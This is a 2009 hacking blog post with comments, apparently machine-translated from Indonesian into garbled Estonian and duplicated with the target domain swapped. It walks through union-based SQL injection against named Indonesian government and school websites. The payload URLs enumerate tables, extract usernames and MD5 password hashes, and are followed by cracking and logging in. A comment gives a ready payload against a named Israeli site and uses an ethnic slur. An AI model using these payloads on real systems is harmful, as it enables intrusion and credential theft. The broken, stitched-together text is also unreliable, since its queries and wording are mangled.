SQL Injection tehnikat inetuks kui Pemerintah kota medan

SQL Injection tehnikat inetuks kui PLN Indoneesia

(NB: ei ole kahju kandnud selle katse ja pean p��rdu saidi administraatori
Perguruan Cikini umbes selle kohta)
Cikini Perguran kool on kool, mis on "name" Jakartas. Hea veebileht disain.
Lihtsalt ei ole ajakohastatud. Wah NIH Administratornya valud. Koduleht on kallis
NIH soalnya ni kodulehel klientide kohta Surya Lintas Global
(www.lintasglobal.com).
Aga kuna see veebileht ei suutnud �ritan aja m�ngida sellel veebilehel. Aasta
algusesse siirryn alapiirkonnast kodulehek�ljel v�hemalt
http://www.sumutprov.go.id.

Siis siirryn Uudised lehek�lg. V�ib JUKU .... artiklit planeedi k�ik oma keeles.
See ei t�henda, mul on admin ngurus artiklit. Kuigi see veebisait on! V�ga
kahjuks! Rohkem raha �li�pilased!
... Ma minna �ks artikkel, nimelt:
http://www.sumutprov.go.id/?page=news?=berita&&act=showdetail&id=4
Siis ma seda muuta tambahin number 4 ees talle tsitaat
http://www.sumutprov.go.id/?page=news?=berita&&act=showdetail&id=4 "
Ka �llatunud, et oli viga SQL syntax on nagu see pilt ...

Aeg SQL Injection! Ma n�en numbreid kolonni oma SQL. Nii et ma saan kasutada liidu
query �kshaaval. Nii n�iteks ma saan kasutada "+ + Vali 1,2 Liidus" selgub, saan
veateate proovida j�tkata nende liit + Vali +1,2,3 "ja nii edasi. Tundus, et
l�petada minu otsing:
http://www.sumutprov.go.id/?page=news&sub=berita&&act=showdetail&id=4 + union +
valige +1,2,3,4
Nr t�rketeate toimub! See t�hendab, et veerus on 4. Ja loetelu kuvatakse numbrid 2
ja 3 pildi all.

Siis ma n�ha, milline versioon MySQL, et on kasutatud. Puhul, et ma ei muutu

number 3 (vt joonis), mis n�ib koos versiooni MySQL et k�suparameeter ..
http://www.sumutprov.go.id/?page=news&sub=berita&&act=showdetail&id=4 + union +
valida 1,2, @ @ versiooni, 4
Ja number 3 on minu magic minu SQL versioon on: p
N�ha, et versioonis kasutatakse 5.0.51a
Kuna versioon on versiooni 5 ja rohkem, siis ma saan nime tabeli veergude ja
lihtsalt. I �ongleerima a number 3, mille nimi on enne lauamagusaine nyah
kasutades information_schema on versiooni Minu SQL 5. Oh, seda sellep�rast, et
ametikohad on esemed h�irivad ma v�in lisada "-" maha oma ID (4 numbrit siin), nii
et k�ik, mida tuleb t�hi.
http://www.sumutprov.go.id/?page=news&sub=berita&&act=showdetail&id=-4 + union +
valida 1,2, table_name, 4 + andmebaasist +
information_schema.tables + kus + table_schema = andmebaasi () --
Vaadates m�ningaid tabeli sellest kohas. Vaata pilte.

Mulle tabelis nimega kasutajatele. Tavaliselt alade �ldine kasutaja store

haldamise tabelis on kajakk Gin. Seet�ttu n�en ma oma veerus selles tabelis. Aga
enne kui ma kirjutada oma j�rgmise p�ringu Akan mengconvert s�na "kasutaja", et
Hex. Ma kasutan online converter http://www.easycalculation.com/ascii-hex.php.
Sealt Tean, et hex selle s�na "kasutaja" on "75736572".
Siis ma t��pi aadress bar:
http://www.sumutprov.go.id/?page=news&sub=berita&&act=showdetail&id=-4 + union +
valida 1,2, column_name, 4 + +
information_schema.columns + +, kus table_name = 0 � 75736572 --
Miks ma oma hex asendada s�na "kasutaja" ning query above? P�hjuseks on see, et
kui ma oma kasutaja ja table_name = Akan viga.
Tulemus? N�en v�ga v�he kahtlased nimed nagu id, nimi, isikut t�endav dokument, ja
nime ja.
N��d ma tahaksin n�ha andmete veerus nime ja passi. Kes v�ib saada parool ja
kasutajanimi seda. Loomulikult koos SQL query uuesti. Kui enne kui ma omakorda 3-
kohaline nimi tuleb muuta veeru, ma n��d number 2 ja 3 soalnya seekord tahaksin
n�ha 2 andmed (nimi ja pass).
http://www.sumutprov.go.id/?page=news&sub=berita&&act=showdetail&id=-4 + union +
valige 1, nimi, isikut t�endav dokument, 4 + + alates user --
Oh .. et viga, sest s�na "name" teadmata sebakai avastatud. Finally, I asendada
see "Nimi", nagu on teistes valdkondades on nimi niimoodi. Kes v�ib �nnestuda.
http://www.sumutprov.go.id/?page=news&sub=berita&&act=showdetail&id=-4 + union +
valige 1, nimi, isikut t�endav dokument, 4 + + alates user --
Edu! N�htava nimi, kasutaja nimi ja selle parool (mis MD5).

(Kahjuks boss tsenseerimise pildil)

I Akanin mencrack kasutaja parool ****** siia (sensorid) mis omavad MD5 parooli
d9d4a2d ******************. MD5 kr�ptitult NIH. Ma dekr�pteerida seda siin.
Milliseid veebisaite, mis decryptor teine MD5 tugevatoimeline r�si valmistatud
sellele saidile.
Alates ala, et ma tean, et p�rast d9d4a2d ****************** on per-dekr�pteerida
***. Hahahaha ... Aga k�igepealt. Salas�na Kasutajatunnus kuid seda teha? Wah ..
veerud m�rgitakse tulemus p�ringu SQL s�ste enne n�idata, kuid mitte
Kasutajatunnus on nimi, et kasutaja, kes sisenesid registrist aeg.
Usut on usut p�rast p��an login kasutajanime p�ritolu oli vajalik, et NIS on
Kasutajatunnus arv (magistrant). M�letan, et vahel veergudes kasutaja tabelis on
�hes veerus nimetusega "NIS". Ma lihtsalt asendada s�na "nimetus" s�naga "NIS".
http://www.sumutprov.go.id/?page=news&sub=berita&&act=showdetail&id=-4 + union +
valige +1, NIS, m��das�idum�ra, 4 + + alates user --
V�lja NIS andmeid parool (MD5 taas). N��d p��an siseneda �hte kohta NIS ja parool
ja ... ... ..

(rohkem andureid Privaatsus: p)

See sait on edukalt hakkeroitu ..
Kahjuks vahele kasutaja ei ole admin on oluline seisukoht. Kui juhtimine v�ib olla
oluline positsiooni jaoks inetuks-NIH. Aga ma ei ole paha mees. Ja j�lle ma ei
kavatse kahju. Mul on p��rduda admin on see n�rkus. Kavatsus on see, et mul on
alla kirjutanud nii admin tahaksin plaaster see bug, et SQL saa teha Hack SQL
Injection teiste Hackers.
Halb uudis See meetod v�ib olla ka rakendatud ala http://tk.http://www.pln-
jaser.co.id, http://sma.http://www.pln-jaser.co.id, http : / / smk.http: / /
www.pln-jaser.co.id ja http://smm.http://www.pln-jaser.co.id!
H�vasti, et j�rgmises artiklis.
(NB: ei ole kahju kandnud selle katse ja pean p��rdu saidi administraatori
Perguruan Cikini umbes selle kohta)
See raamat on kirjutatud Fariskhi ja n�idata 13. jaanuar 2009 kell 12:39 ja
kategooria H�kkimine / l�henemist. J�rjehoidja Permalink. J�rgige k�iki
kommentaare siin Kommentaar RSS Feed. J�ta kommentaar v�i j�tke Trackback:
Trackback URL.

12 Kommentaarid
� Beast �tles:
Hea t��
13. jaanuar 2009 kell 2:11
� Bedjo �tles:
belom veel plaastri kimbu. bener2 t�rksate emang
24. jaanuar 2009 kell 2:09
� Fariskhi �tles:
@ Bedjo
Lha ... kodulehel aja udah GAK pernah p�evakajastamine aastast aastasse ...
24. jaanuar 2009 kell 5:38
� Semy �tles:
Suur
24. jaanuar 2009 kell 9:10
� Reno �tles:
wees OKE Deh bro
25. jaanuar 2009 kell 12:18
�:: FarisBlog:: Fariskhi's Blog �Blog Archive� Answering v�ljakutsete Suko.web.id
�tles:
[...] SQL Injection Junioriaikidon Percik Veebileht [...]
Jaanuar 26th, 2009 11:44
� Nvay �tles:
Hhaaa ... lahe. Kuw otsida terget. J�rgmine eesm�rk on:. Mu /. Il: D [- <
5. veebruar 2009 kell 2:52
� Fariskhi �tles:
@ Nvay
Kui soovid. Il NIH GW kasih!
http://www.oriyakabala.co.il/news.php?id=-50 + union + valida 0,1, user_webadmin,
3, pass_webadmin, 5,6 + + webadmin_admins --
Seal tuh oprek kodulehek�ljel Israelshit.
5. veebruar 2009 kell 5:03
� m4t4 �tles:
Bro Kalo Mida 5 s�testatakse versiooni mida? ja apaan information_schema?
5. veebruar 2009 kell 9:51
� Fariskhi �tles:
@ M4t4
Kui versioon 5, et ma alla nebak-nebak ya dicocokin �ks �he andmebaasi. Pake aja
schemafuzz teha nyocok-nyocokin automaatselt. Kuidas aja di google juhendaja umbes
Schemafuzz.
Teave Schema et see on funktsioon, mis on koosk�las MySQL versioon 5 ja �lespoole.
On selge, et h�lbustada kasutajal majandamise valdkonnas / tabeleid. Aga kui ala
on v�imalik SQL diinjek saame kasutada info�hiskonna Schema ette tabeli ja veeru
nime. .
5. veebruar 2009 kell 10:14 PM
� Ahmad Ahmad Said:
Slick luksusajakiri �ppimiseks ei ole ngancurin mas eh?
6. veebruar 2009 kell 11:19
� Fariskhi �tles:
Ahmad Ahmad @
Mul on oluline saidi bener-bener dijagain. Ma ei osta kalleid-nii kallid
ditelantari aja.
6. veebruar 2009 at 11:55

kiire ja lihtne juhend temppu SQL s�stelahus www.pemkomedan.go.id/ Koduleht

(NB: ei ole kahju kandnud selle katse ja pean p��rdu saidi administraatori
Perguruan Cikini umbes selle kohta)
Cikini Perguran kool on kool, mis on "name" Jakartas. Hea veebileht disain.
Lihtsalt ei ole ajakohastatud. Wah NIH Administratornya valud. Koduleht on kallis
NIH soalnya ni kodulehel klientide kohta Surya Lintas Global
(www.lintasglobal.com).
Aga kuna see veebileht ei suutnud �ritan aja m�ngida sellel veebilehel. Aasta
algusesse siirryn alapiirkonnast kodulehek�ljel v�hemalt
http://www.pemkomedan.go.id/.

Siis siirryn Uudised lehek�lg. V�ib JUKU .... artiklit planeedi k�ik oma keeles.
See ei t�henda, mul on admin ngurus artiklit. Kuigi see veebisait on! V�ga
kahjuks! Rohkem raha �li�pilased!
... Ma minna �ks artikkel, nimelt:
http://www.pemkomedan.go.id//?page=news?=berita&&act=showdetail&id=4
Siis ma seda muuta tambahin number 4 ees talle tsitaat
http://www.pemkomedan.go.id//?page=news?=berita&&act=showdetail&id=4 "
Ka �llatunud, et oli viga SQL syntax on nagu see pilt ...

Aeg SQL Injection! Ma n�en numbreid kolonni oma SQL. Nii et ma saan kasutada liidu
query �kshaaval. Nii n�iteks ma saan kasutada "+ + Vali 1,2 Liidus" selgub, saan
veateate proovida j�tkata nende liit + Vali +1,2,3 "ja nii edasi. Tundus, et
l�petada minu otsing:
http://www.pemkomedan.go.id//?page=news&sub=berita&&act=showdetail&id=4 + union +
valige +1,2,3,4
Nr t�rketeate toimub! See t�hendab, et veerus on 4. Ja loetelu kuvatakse numbrid 2
ja 3 pildi all.

Siis ma n�ha, milline versioon MySQL, et on kasutatud. Puhul, et ma ei muutu

number 3 (vt joonis), mis n�ib koos versiooni MySQL et k�suparameeter ..
http://www.pemkomedan.go.id//?page=news&sub=berita&&act=showdetail&id=4 + union +
valida 1,2, @ @ versiooni, 4
Ja number 3 on minu magic minu SQL versioon on: p
N�ha, et versioonis kasutatakse 5.0.51a
Kuna versioon on versiooni 5 ja rohkem, siis ma saan nime tabeli veergude ja
lihtsalt. I �ongleerima a number 3, mille nimi on enne lauamagusaine nyah
kasutades information_schema on versiooni Minu SQL 5. Oh, seda sellep�rast, et
ametikohad on esemed h�irivad ma v�in lisada "-" maha oma ID (4 numbrit siin), nii
et k�ik, mida tuleb t�hi.
http://www.pemkomedan.go.id//?page=news&sub=berita&&act=showdetail&id=-4 + union +
valida 1,2, table_name, 4 + andmebaasist +
information_schema.tables + kus + table_schema = andmebaasi () --
Vaadates m�ningaid tabeli sellest kohas. Vaata pilte.

Mulle tabelis nimega kasutajatele. Tavaliselt alade �ldine kasutaja store

haldamise tabelis on kajakk Gin. Seet�ttu n�en ma oma veerus selles tabelis. Aga
enne kui ma kirjutada oma j�rgmise p�ringu Akan mengconvert s�na "kasutaja", et
Hex. Ma kasutan online converter http://www.easycalculation.com/ascii-hex.php.
Sealt Tean, et hex selle s�na "kasutaja" on "75736572".
Siis ma t��pi aadress bar:
http://www.pemkomedan.go.id//?page=news&sub=berita&&act=showdetail&id=-4 + union +
valida 1,2, column_name, 4 + +
information_schema.columns + +, kus table_name = 0 � 75736572 --
Miks ma oma hex asendada s�na "kasutaja" ning query above? P�hjuseks on see, et
kui ma oma kasutaja ja table_name = Akan viga.
Tulemus? N�en v�ga v�he kahtlased nimed nagu id, nimi, isikut t�endav dokument, ja
nime ja.
N��d ma tahaksin n�ha andmete veerus nime ja passi. Kes v�ib saada parool ja
kasutajanimi seda. Loomulikult koos SQL query uuesti. Kui enne kui ma omakorda 3-
kohaline nimi tuleb muuta veeru, ma n��d number 2 ja 3 soalnya seekord tahaksin
n�ha 2 andmed (nimi ja pass).
http://www.pemkomedan.go.id//?page=news&sub=berita&&act=showdetail&id=-4 + union +
valige 1, nimi, isikut t�endav dokument, 4 + + alates user --
Oh .. et viga, sest s�na "name" teadmata sebakai avastatud. Finally, I asendada
see "Nimi", nagu on teistes valdkondades on nimi niimoodi. Kes v�ib �nnestuda.
http://www.pemkomedan.go.id//?page=news&sub=berita&&act=showdetail&id=-4 + union +
valige 1, nimi, isikut t�endav dokument, 4 + + alates user --
Edu! N�htava nimi, kasutaja nimi ja selle parool (mis MD5).

(Kahjuks boss tsenseerimise pildil)

I Akanin mencrack kasutaja parool ****** siia (sensorid) mis omavad MD5 parooli
d9d4a2d ******************. MD5 kr�ptitult NIH. Ma dekr�pteerida seda siin.
Milliseid veebisaite, mis decryptor teine MD5 tugevatoimeline r�si valmistatud
sellele saidile.
Alates ala, et ma tean, et p�rast d9d4a2d ****************** on per-dekr�pteerida
***. Hahahaha ... Aga k�igepealt. Salas�na Kasutajatunnus kuid seda teha? Wah ..
veerud m�rgitakse tulemus p�ringu SQL s�ste enne n�idata, kuid mitte
Kasutajatunnus on nimi, et kasutaja, kes sisenesid registrist aeg.
Usut on usut p�rast p��an login kasutajanime p�ritolu oli vajalik, et NIS on
Kasutajatunnus arv (magistrant). M�letan, et vahel veergudes kasutaja tabelis on
�hes veerus nimetusega "NIS". Ma lihtsalt asendada s�na "nimetus" s�naga "NIS".
http://www.pemkomedan.go.id//?page=news&sub=berita&&act=showdetail&id=-4 + union +
valige +1, NIS, m��das�idum�ra, 4 + + alates user --
V�lja NIS andmeid parool (MD5 taas). N��d p��an siseneda �hte kohta NIS ja parool
ja ... ... ..

(rohkem andureid Privaatsus: p)

See sait on edukalt hakkeroitu ..
Kahjuks vahele kasutaja ei ole admin on oluline seisukoht. Kui juhtimine v�ib olla
oluline positsiooni jaoks inetuks-NIH. Aga ma ei ole paha mees. Ja j�lle ma ei
kavatse kahju. Mul on p��rduda admin on see n�rkus. Kavatsus on see, et mul on
alla kirjutanud nii admin tahaksin plaaster see bug, et SQL saa teha Hack SQL
Injection teiste Hackers.
Halb uudis See meetod v�ib olla ka rakendatud ala http://tk.percikschool.com,
http://sma.percikschool.com, http://smk.percikschool.com ja
http://smm.percikschool.com!
H�vasti, et j�rgmises artiklis.
(NB: ei ole kahju kandnud selle katse ja pean p��rdu saidi administraatori
Perguruan Cikini umbes selle kohta)
See raamat on kirjutatud Fariskhi ja n�idata 13. jaanuar 2009 kell 12:39 ja
kategooria H�kkimine / l�henemist. J�rjehoidja Permalink. J�rgige k�iki
kommentaare siin Kommentaar RSS Feed. J�ta kommentaar v�i j�tke Trackback:
Trackback URL.

12 Kommentaarid
� Beast �tles:
Hea t��
13. jaanuar 2009 kell 2:11
� Bedjo �tles:
belom veel plaastri kimbu. bener2 t�rksate emang
24. jaanuar 2009 kell 2:09
� Fariskhi �tles:
@ Bedjo
Lha ... kodulehel aja udah GAK pernah p�evakajastamine aastast aastasse ...
24. jaanuar 2009 kell 5:38
� Semy �tles:
Suur
24. jaanuar 2009 kell 9:10
� Reno �tles:
wees OKE Deh bro
25. jaanuar 2009 kell 12:18
�:: FarisBlog:: Fariskhi's Blog �Blog Archive� Answering v�ljakutsete Suko.web.id
�tles:
[...] SQL Injection Junioriaikidon Percik Veebileht [...]
Jaanuar 26th, 2009 11:44
� Nvay �tles:
Hhaaa ... lahe. Kuw otsida terget. J�rgmine eesm�rk on:. Mu /. Il: D [- <
5. veebruar 2009 kell 2:52
� Fariskhi �tles:
@ Nvay
Kui soovid. Il NIH GW kasih!
http://www.oriyakabala.co.il/news.php?id=-50 + union + valida 0,1, user_webadmin,
3, pass_webadmin, 5,6 + + webadmin_admins --
Seal tuh oprek kodulehek�ljel Israelshit.
5. veebruar 2009 kell 5:03
� m4t4 �tles:
Bro Kalo Mida 5 s�testatakse versiooni mida? ja apaan information_schema?
5. veebruar 2009 kell 9:51
� Fariskhi �tles:
@ M4t4
Kui versioon 5, et ma alla nebak-nebak ya dicocokin �ks �he andmebaasi. Pake aja
schemafuzz teha nyocok-nyocokin automaatselt. Kuidas aja di google juhendaja umbes
Schemafuzz.
Teave Schema et see on funktsioon, mis on koosk�las MySQL versioon 5 ja �lespoole.
On selge, et h�lbustada kasutajal majandamise valdkonnas / tabeleid. Aga kui ala
on v�imalik SQL diinjek saame kasutada info�hiskonna Schema ette tabeli ja veeru
nime. .
5. veebruar 2009 kell 10:14 PM
� Ahmad Ahmad Said:
Slick luksusajakiri �ppimiseks ei ole ngancurin mas eh?
6. veebruar 2009 kell 11:19
� Fariskhi �tles:
Ahmad Ahmad @
Mul on oluline saidi bener-bener dijagain. Ma ei osta kalleid-nii kallid
ditelantari aja.
6. veebruar 2009 at 11:55